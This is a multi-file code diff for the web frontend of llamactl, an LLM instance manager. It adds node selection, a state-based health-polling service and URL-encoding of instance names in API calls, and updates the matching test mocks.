<Button
type="button"
variant="ghost"
size="sm"
onClick={handleImportFile}
title="Import instance configuration from JSON file"
className="ml-2"
>
<Upload className="h-4 w-4 mr-2" />
Import
</Button>
)}
</div>
<input
ref={fileInputRef}
type="file"
accept=".json"
onChange={handleFileChange}
className="hidden"
/>
</DialogHeader>
<div className="flex-1 overflow-y-auto">

View File

@@ -56,9 +56,9 @@ function InstanceList({ editInstance }: InstanceListProps) {
<MemoizedInstanceCard
key={instance.name}
instance={instance}
startInstance={startInstance}
stopInstance={stopInstance}
deleteInstance={deleteInstance}
startInstance={() => { void startInstance(instance.name) }}
stopInstance={() => { void stopInstance(instance.name) }}
deleteInstance={() => { void deleteInstance(instance.name) }}
editInstance={editInstance}
/>
))}

View File

@@ -54,7 +54,7 @@ const ParseCommandDialog: React.FC<ParseCommandDialogProps> = ({
options = await backendsApi.vllm.parseCommand(command);
break;
default:
throw new Error(`Unsupported backend type: ${backendType}`);
throw new Error(`Unsupported backend type: ${String(backendType)}`);
}
onParsed(options);

View File

@@ -2,12 +2,16 @@ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { type Instance, BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({
useInstanceHealth: vi.fn(() => ({ status: 'ok', lastChecked: new Date() }))
useInstanceHealth: vi.fn(() => ({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
}))
}))
describe('InstanceCard - Instance Actions and State', () => {

View File

@@ -12,12 +12,14 @@ import { AuthProvider } from '@/contexts/AuthContext'
vi.mock('@/lib/api', () => ({
instancesApi: {
list: vi.fn(),
get: vi.fn(),
create: vi.fn(),
update: vi.fn(),
start: vi.fn(),
stop: vi.fn(),
restart: vi.fn(),
delete: vi.fn(),
getHealth: vi.fn(),
}
}))
@@ -25,9 +27,21 @@ vi.mock('@/lib/api', () => ({
vi.mock('@/lib/healthService', () => ({
healthService: {
subscribe: vi.fn(() => () => {}),
checkHealth: vi.fn(),
refreshHealth: vi.fn(() => Promise.resolve()),
checkHealthAfterOperation: vi.fn(),
performHealthCheck: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
},
checkHealth: vi.fn(),
checkHealth: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
}))
function renderInstanceList(editInstance = vi.fn()) {

View File

@@ -1,4 +1,4 @@
import React from 'react'
import React, { useState, useEffect } from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
import { Label } from '@/components/ui/label'
@@ -7,6 +7,8 @@ import AutoRestartConfiguration from '@/components/instance/AutoRestartConfigura
import NumberInput from '@/components/form/NumberInput'
import CheckboxInput from '@/components/form/CheckboxInput'
import EnvironmentVariablesInput from '@/components/form/EnvironmentVariablesInput'
import SelectInput from '@/components/form/SelectInput'
import { nodesApi, type NodesMap } from '@/lib/api'
interface InstanceSettingsCardProps {
instanceName: string
@@ -25,6 +27,46 @@ const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
onNameChange,
onChange
}) => {
const [nodes, setNodes] = useState<NodesMap>({})
const [loadingNodes, setLoadingNodes] = useState(true)
// Load the available nodes once on mount and, if the form has no node
// selected, pre-select the first one. Because the dependency list is empty,
// `formData` and `onChange` are the values captured at mount time.
useEffect(() => {
  // Flipped by the cleanup so a response arriving after unmount is ignored
  // instead of updating state or writing into the parent's form data.
  let cancelled = false

  const fetchNodes = async () => {
    try {
      const fetchedNodes = await nodesApi.list()
      if (cancelled) return

      setNodes(fetchedNodes)

      // Auto-select first node if none selected
      const nodeNames = Object.keys(fetchedNodes)
      if (nodeNames.length > 0 && (!formData.nodes || formData.nodes.length === 0)) {
        onChange('nodes', [nodeNames[0]])
      }
    } catch (error) {
      console.error('Failed to fetch nodes:', error)
    } finally {
      if (!cancelled) {
        setLoadingNodes(false)
      }
    }
  }

  void fetchNodes()

  return () => {
    cancelled = true
  }
  // eslint-disable-next-line react-hooks/exhaustive-deps
}, [])
const nodeOptions = Object.keys(nodes).map(nodeName => ({
value: nodeName,
label: nodeName
}))
// Stores the selected node as a single-element list; an empty or missing
// selection clears the `nodes` field.
const handleNodeChange = (value: string | undefined) => {
  onChange('nodes', value ? [value] : undefined)
}
const selectedNode = formData.nodes && formData.nodes.length > 0 ? formData.nodes[0] : ''
return (
<Card>
<CardHeader>
@@ -50,6 +92,19 @@ const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
</p>
</div>
{/* Node Selection */}
{!loadingNodes && Object.keys(nodes).length > 0 && (
<SelectInput
id="node"
label="Node"
value={selectedNode}
onChange={handleNodeChange}
options={nodeOptions}
description={isEditing ? "Node cannot be changed after instance creation" : "Select the node where the instance will run"}
disabled={isEditing}
/>
)}
{/* Auto Restart Configuration */}
<AutoRestartConfiguration
formData={formData}

View File

@@ -1,4 +1,4 @@
import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
import { type ReactNode, createContext, useCallback, useContext, useEffect, useState } from 'react'
interface AuthContextState {
isAuthenticated: boolean
@@ -62,7 +62,7 @@ export const AuthProvider = ({ children }: AuthProviderProps) => {
// Validate API key by making a test request
const validateApiKey = async (key: string): Promise<boolean> => {
try {
const response = await fetch('/api/v1/instances', {
const response = await fetch(document.baseURI + 'api/v1/instances', {
headers: {
'Authorization': `Bearer ${key}`,
'Content-Type': 'application/json'

View File

@@ -2,6 +2,7 @@ import { type ReactNode, createContext, useContext, useState, useEffect, useCall
import type { CreateInstanceOptions, Instance } from '@/types/instance'
import { instancesApi } from '@/lib/api'
import { useAuth } from '@/contexts/AuthContext'
import { healthService } from '@/lib/healthService'
interface InstancesContextState {
instances: Instance[]
@@ -115,6 +116,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
// Trigger health check after starting
healthService.checkHealthAfterOperation(name, 'start')
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to start instance')
}
@@ -127,6 +131,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
// Update only this instance's status
updateInstanceInMap(name, { status: "stopped" })
// Trigger health check after stopping
healthService.checkHealthAfterOperation(name, 'stop')
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to stop instance')
}
@@ -139,6 +146,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
// Trigger health check after restarting
healthService.checkHealthAfterOperation(name, 'restart')
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to restart instance')
}

View File

@@ -11,15 +11,38 @@ import { AuthProvider } from "../AuthContext";
vi.mock("@/lib/api", () => ({
instancesApi: {
list: vi.fn(),
get: vi.fn(),
create: vi.fn(),
update: vi.fn(),
start: vi.fn(),
stop: vi.fn(),
restart: vi.fn(),
delete: vi.fn(),
getHealth: vi.fn(),
},
}));
// Mock health service
vi.mock("@/lib/healthService", () => ({
healthService: {
subscribe: vi.fn(() => () => {}),
refreshHealth: vi.fn(() => Promise.resolve()),
checkHealthAfterOperation: vi.fn(),
performHealthCheck: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
},
checkHealth: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
}));
// Test component to access context
function TestComponent() {
const {

View File

@@ -7,24 +7,23 @@ export function useInstanceHealth(instanceName: string, instanceStatus: Instance
const [health, setHealth] = useState<HealthStatus | undefined>()
useEffect(() => {
if (instanceStatus === "stopped") {
setHealth({ status: "unknown", lastChecked: new Date() })
return
}
if (instanceStatus === "failed") {
setHealth({ status: instanceStatus, lastChecked: new Date() })
return
}
// Subscribe to health updates for this instance
const unsubscribe = healthService.subscribe(instanceName, (healthStatus) => {
setHealth(healthStatus)
})
// Cleanup subscription on unmount or when instanceStatus changes
// Cleanup subscription on unmount or when instance changes
return unsubscribe
}, [instanceName])
// Trigger health check when instance status changes to active states
useEffect(() => {
if (instanceStatus === 'running' || instanceStatus === 'restarting' || instanceStatus === 'shutting_down') {
healthService.refreshHealth(instanceName).catch(error => {
console.error(`Failed to refresh health for ${instanceName}:`, error)
})
}
}, [instanceName, instanceStatus])
return health
}
}

View File

@@ -1,5 +1,5 @@
import { describe, it, expect, vi, beforeEach } from 'vitest'
import { instancesApi } from '@/lib/api'
import { beforeEach, describe, expect, it, vi } from 'vitest'
// Mock fetch globally
const mockFetch = vi.fn()
@@ -11,11 +11,13 @@ describe('API Error Handling', () => {
})
it('converts HTTP errors to meaningful messages', async () => {
mockFetch.mockResolvedValue({
const mockResponse = {
ok: false,
status: 409,
text: () => Promise.resolve('Instance already exists')
})
text: () => Promise.resolve('Instance already exists'),
clone: function() { return this }
}
mockFetch.mockResolvedValue(mockResponse)
await expect(instancesApi.create('existing', {}))
.rejects
@@ -23,11 +25,13 @@ describe('API Error Handling', () => {
})
it('handles empty error responses gracefully', async () => {
mockFetch.mockResolvedValue({
const mockResponse = {
ok: false,
status: 500,
text: () => Promise.resolve('')
})
text: () => Promise.resolve(''),
clone: function() { return this }
}
mockFetch.mockResolvedValue(mockResponse)
await expect(instancesApi.list())
.rejects
@@ -53,7 +57,9 @@ describe('API Error Handling', () => {
await instancesApi.getLogs('test-instance', 100)
expect(mockFetch).toHaveBeenCalledWith(
'/api/v1/instances/test-instance/logs?lines=100',
expect.stringMatching(
/^https?:\/\/[^/]+\/api\/v1\/instances\/test-instance\/logs\?lines=100$/
),
expect.any(Object)
)
})

View File

@@ -1,7 +1,10 @@
import type { CreateInstanceOptions, Instance } from "@/types/instance";
import { handleApiError } from "./errorUtils";
const API_BASE = "/api/v1";
// Adding baseURI as a prefix to support being served behind a subpath
// e.g. when llamactl's `/` is served behind a reverse proxy at `/proxy/...`
// the baseURI will be `<origin>/proxy/` and the API calls will be made to `<origin>/proxy/api/v1/<endpoint>`
export const API_BASE = document.baseURI + "api/v1";
// Base API call function with error handling
async function apiCall<T>(
@@ -46,11 +49,8 @@ async function apiCall<T>(
} else {
// Handle empty responses for JSON endpoints
const contentLength = response.headers.get('content-length');
if (contentLength === '0' || contentLength === null) {
const text = await response.text();
if (text.trim() === '') {
return {} as T; // Return empty object for empty JSON responses
}
if (contentLength === '0') {
return {} as T; // Return empty object for empty JSON responses
}
const data = await response.json() as T;
return data;
@@ -103,58 +103,74 @@ export const backendsApi = {
},
};
// Node API types
export interface NodeResponse {
address: string;
}
export type NodesMap = Record<string, NodeResponse>;
// Node API functions
export const nodesApi = {
// GET /nodes - returns map of node name to NodeResponse
list: () => apiCall<NodesMap>("/nodes"),
// GET /nodes/{name}
get: (name: string) => apiCall<NodeResponse>(`/nodes/${encodeURIComponent(name)}`),
};
// Instance API functions
export const instancesApi = {
// GET /instances
list: () => apiCall<Instance[]>("/instances"),
// GET /instances/{name}
get: (name: string) => apiCall<Instance>(`/instances/${name}`),
get: (name: string) => apiCall<Instance>(`/instances/${encodeURIComponent(name)}`),
// POST /instances/{name}
create: (name: string, options: CreateInstanceOptions) =>
apiCall<Instance>(`/instances/${name}`, {
apiCall<Instance>(`/instances/${encodeURIComponent(name)}`, {
method: "POST",
body: JSON.stringify(options),
}),
// PUT /instances/{name}
update: (name: string, options: CreateInstanceOptions) =>
apiCall<Instance>(`/instances/${name}`, {
apiCall<Instance>(`/instances/${encodeURIComponent(name)}`, {
method: "PUT",
body: JSON.stringify(options),
}),
// DELETE /instances/{name}
delete: (name: string) =>
apiCall<void>(`/instances/${name}`, {
apiCall<void>(`/instances/${encodeURIComponent(name)}`, {
method: "DELETE",
}),
// POST /instances/{name}/start
start: (name: string) =>
apiCall<Instance>(`/instances/${name}/start`, {
apiCall<Instance>(`/instances/${encodeURIComponent(name)}/start`, {
method: "POST",
}),
// POST /instances/{name}/stop
stop: (name: string) =>
apiCall<Instance>(`/instances/${name}/stop`, {
apiCall<Instance>(`/instances/${encodeURIComponent(name)}/stop`, {
method: "POST",
}),
// POST /instances/{name}/restart
restart: (name: string) =>
apiCall<Instance>(`/instances/${name}/restart`, {
apiCall<Instance>(`/instances/${encodeURIComponent(name)}/restart`, {
method: "POST",
}),
// GET /instances/{name}/logs
getLogs: (name: string, lines?: number) => {
const params = lines ? `?lines=${lines}` : "";
return apiCall<string>(`/instances/${name}/logs${params}`, {}, "text");
return apiCall<string>(`/instances/${encodeURIComponent(name)}/logs${params}`, {}, "text");
},
// GET /instances/{name}/proxy/health
getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${name}/proxy/health`),
getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${encodeURIComponent(name)}/proxy/health`),
};

View File

@@ -26,7 +26,8 @@ export async function handleApiError(response: Response): Promise<void> {
}
if (!response.ok) {
const errorMessage = await parseErrorResponse(response)
// Clone the response before reading to avoid consuming the body stream
const errorMessage = await parseErrorResponse(response.clone())
throw new Error(errorMessage)
}
}

View File

@@ -1,51 +1,161 @@
import { type HealthStatus } from '@/types/instance'
import { type HealthStatus, type InstanceStatus, type HealthState } from '@/types/instance'
import { instancesApi } from '@/lib/api'
type HealthCallback = (health: HealthStatus) => void
// Polling intervals based on health state (in milliseconds)
const POLLING_INTERVALS: Record<HealthState, number> = {
'starting': 5000, // 5 seconds - frequent during startup
'restarting': 5000, // 5 seconds - restart in progress
'shutting_down': 3000, // 3 seconds - monitor shutdown progress
'ready': 60000, // 60 seconds - stable state
'stopped': 0, // No polling
'failed': 0, // No polling
}
class HealthService {
private intervals: Map<string, NodeJS.Timeout> = new Map()
private callbacks: Map<string, Set<HealthCallback>> = new Map()
private lastHealthState: Map<string, HealthState> = new Map()
private healthCache: Map<string, { health: HealthStatus; timestamp: number }> = new Map()
private readonly CACHE_TTL = 2000 // 2 seconds cache
/**
* Performs a two-tier health check:
* 1. Get instance status from backend (authoritative)
* 2. If running, perform HTTP health check
*/
async performHealthCheck(instanceName: string): Promise<HealthStatus> {
// Check cache first
const cached = this.healthCache.get(instanceName)
if (cached && Date.now() - cached.timestamp < this.CACHE_TTL) {
return cached.health
}
async checkHealth(instanceName: string): Promise<HealthStatus> {
try {
await instancesApi.getHealth(instanceName)
return {
status: 'ok',
lastChecked: new Date()
}
} catch (error) {
if (error instanceof Error) {
// Check if it's a 503 (service unavailable - loading)
if (error.message.includes('503')) {
return {
status: 'loading',
message: 'Instance is starting up',
lastChecked: new Date()
// Step 1: Get instance details (includes status)
const instance = await instancesApi.get(instanceName)
// Step 2: If running, attempt HTTP health check
if (instance.status === 'running') {
try {
await instancesApi.getHealth(instanceName)
// HTTP health check succeeded - instance is ready
const health: HealthStatus = {
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
}
this.updateCache(instanceName, health)
return health
} catch (httpError) {
// HTTP health check failed - instance is still starting
// Any error (503, connection refused, timeout, etc.) means "starting"
const health: HealthStatus = {
state: 'starting',
instanceStatus: 'running',
lastChecked: new Date(),
error: httpError instanceof Error ? httpError.message : 'Health check failed',
source: 'http'
}
this.updateCache(instanceName, health)
return health
}
return {
status: 'error',
message: error.message,
lastChecked: new Date()
} else {
// Instance not running - map backend status directly
const health: HealthStatus = {
state: this.mapStatusToHealthState(instance.status),
instanceStatus: instance.status,
lastChecked: new Date(),
source: 'backend'
}
this.updateCache(instanceName, health)
return health
}
return {
status: 'error',
message: 'Unknown error',
lastChecked: new Date()
}
} catch (error) {
// Failed to get instance status from backend
// This is a backend communication error, not an instance health error
// Let the error propagate so polling can retry
console.error(`Failed to get instance status for ${instanceName}:`, error)
throw error
}
}
/**
 * Translates the instance status reported by the backend into the
 * corresponding health state.
 */
private mapStatusToHealthState(status: InstanceStatus): HealthState {
  const stateByStatus: Record<InstanceStatus, HealthState> = {
    stopped: 'stopped',
    // Not expected here: running instances are classified by the HTTP check
    running: 'starting',
    failed: 'failed',
    restarting: 'restarting',
    shutting_down: 'shutting_down',
  }
  return stateByStatus[status]
}
/**
* Updates health cache
*/
private updateCache(instanceName: string, health: HealthStatus): void {
this.healthCache.set(instanceName, {
health,
timestamp: Date.now()
})
}
/**
 * Manually refresh health for an instance.
 *
 * Drops the cached result, performs a fresh health check and pushes the
 * result to the instance's subscribers. When the instance has subscribers
 * and its health state changed, the polling interval is re-tuned for the
 * new state. Failures are logged and never rejected to the caller.
 */
async refreshHealth(instanceName: string): Promise<void> {
  // Invalidate cache so the check below is not served a stale result
  this.healthCache.delete(instanceName)

  try {
    const health = await this.performHealthCheck(instanceName)
    this.notifyCallbacks(instanceName, health)

    // This method can be invoked for an instance nobody is subscribed to,
    // and the last subscriber may have left while the check was in flight.
    // Tracked state and timers are only released on unsubscribe/destroy, so
    // recording state or starting a poll here would leak them.
    if (!this.callbacks.has(instanceName)) {
      return
    }

    // Update last state and adjust polling interval if needed
    const previousState = this.lastHealthState.get(instanceName)
    this.lastHealthState.set(instanceName, health.state)

    if (previousState !== health.state) {
      this.adjustPollingInterval(instanceName, health.state)
    }
  } catch (error) {
    // Error getting health - keep polling if active
    console.error(`Failed to refresh health for ${instanceName}:`, error)
  }
}
/**
 * Kicks off a fresh health check right after a start/stop/restart request.
 * Fire-and-forget: the result reaches subscribers through refreshHealth,
 * and any rejection is only logged.
 */
checkHealthAfterOperation(instanceName: string, operation: 'start' | 'stop' | 'restart'): void {
  const reportFailure = (error: unknown): void => {
    console.error(`Failed to check health after ${operation}:`, error)
  }

  // Drop any cached result before re-checking
  this.healthCache.delete(instanceName)

  this.refreshHealth(instanceName).catch(reportFailure)
}
/**
* Subscribe to health updates for an instance
*/
subscribe(instanceName: string, callback: HealthCallback): () => void {
if (!this.callbacks.has(instanceName)) {
this.callbacks.set(instanceName, new Set())
}
this.callbacks.get(instanceName)!.add(callback)
// Start health checking if this is the first subscriber
@@ -58,36 +168,76 @@ class HealthService {
const callbacks = this.callbacks.get(instanceName)
if (callbacks) {
callbacks.delete(callback)
// Stop health checking if no more subscribers
if (callbacks.size === 0) {
this.stopHealthCheck(instanceName)
this.callbacks.delete(instanceName)
this.lastHealthState.delete(instanceName)
this.healthCache.delete(instanceName)
}
}
}
}
/**
* Start health checking for an instance
*/
private startHealthCheck(instanceName: string): void {
if (this.intervals.has(instanceName)) {
return // Already checking
}
// Initial check with delay
setTimeout(async () => {
const health = await this.checkHealth(instanceName)
this.notifyCallbacks(instanceName, health)
// Start periodic checks
const interval = setInterval(async () => {
const health = await this.checkHealth(instanceName)
this.notifyCallbacks(instanceName, health)
}, 60000)
this.intervals.set(instanceName, interval)
}, 5000)
// Initial check immediately
this.refreshHealth(instanceName).then(() => {
const currentState = this.lastHealthState.get(instanceName)
if (currentState) {
this.adjustPollingInterval(instanceName, currentState)
}
}).catch(error => {
console.error(`Failed to start health check for ${instanceName}:`, error)
})
}
/**
 * Adjust polling interval based on current health state.
 *
 * Stops the current poll for the instance and, if the instance still has
 * subscribers and the state has a positive interval in POLLING_INTERVALS,
 * starts a new one. Each tick performs a health check, notifies subscribers
 * and re-tunes the interval when the state changes.
 */
private adjustPollingInterval(instanceName: string, state: HealthState): void {
  // Clear existing interval
  this.stopHealthCheck(instanceName)

  // Never poll on behalf of an instance nobody is listening to; such a timer
  // would only be cleared by destroy().
  if (!this.callbacks.has(instanceName)) {
    return
  }

  const pollInterval = POLLING_INTERVALS[state]

  // Don't poll for stable states (stopped, failed). A state missing from the
  // table is treated the same way: an undefined delay makes setInterval fire
  // as fast as the runtime allows.
  if (!pollInterval || pollInterval <= 0) {
    return
  }

  // Start new interval with appropriate timing
  const interval = setInterval(async () => {
    try {
      const health = await this.performHealthCheck(instanceName)

      // The last subscriber may have left while the check was in flight;
      // don't record state or start a new timer for it.
      if (!this.callbacks.has(instanceName)) {
        return
      }

      this.notifyCallbacks(instanceName, health)

      // Check if state changed and adjust interval
      const previousState = this.lastHealthState.get(instanceName)
      this.lastHealthState.set(instanceName, health.state)

      if (previousState !== health.state) {
        this.adjustPollingInterval(instanceName, health.state)
      }
    } catch (error) {
      console.error(`Health check failed for ${instanceName}:`, error)
      // Continue polling even on error
    }
  }, pollInterval)

  this.intervals.set(instanceName, interval)
}
/**
* Stop health checking for an instance
*/
private stopHealthCheck(instanceName: string): void {
const interval = this.intervals.get(instanceName)
if (interval) {
@@ -96,6 +246,9 @@ class HealthService {
}
}
/**
* Notify all callbacks with health update
*/
private notifyCallbacks(instanceName: string, health: HealthStatus): void {
const callbacks = this.callbacks.get(instanceName)
if (callbacks) {
@@ -103,16 +256,21 @@ class HealthService {
}
}
stopAll(): void {
/**
* Stop all health checking and cleanup
*/
destroy(): void {
this.intervals.forEach(interval => clearInterval(interval))
this.intervals.clear()
this.callbacks.clear()
this.lastHealthState.clear()
this.healthCache.clear()
}
}
export const healthService = new HealthService()
// Export the individual checkHealth function as well
// Export the individual performHealthCheck function as well
export async function checkHealth(instanceName: string): Promise<HealthStatus> {
return healthService.checkHealth(instanceName)
}
return healthService.performHealthCheck(instanceName)
}

View File

@@ -39,6 +39,9 @@ export const CreateInstanceOptionsSchema = z.object({
// Backend configuration
backend_type: z.enum([BackendType.LLAMA_CPP, BackendType.MLX_LM, BackendType.VLLM]).optional(),
backend_options: BackendOptionsSchema.optional(),
// Node configuration
nodes: z.array(z.string()).optional(),
})
// Re-export types and schemas from backend files

View File

@@ -11,12 +11,16 @@ export const BackendType = {
export type BackendTypeValue = typeof BackendType[keyof typeof BackendType]
export type InstanceStatus = 'running' | 'stopped' | 'failed'
export type InstanceStatus = 'running' | 'stopped' | 'failed' | 'restarting' | 'shutting_down'
export type HealthState = 'stopped' | 'starting' | 'ready' | 'failed' | 'restarting' | 'shutting_down'
export interface HealthStatus {
status: 'ok' | 'loading' | 'error' | 'unknown' | 'failed'
message?: string
state: HealthState
instanceStatus: InstanceStatus
lastChecked: Date
error?: string
source: 'backend' | 'http'
}
export interface Instance {

Some files were not shown because too many files have changed in this diff Show More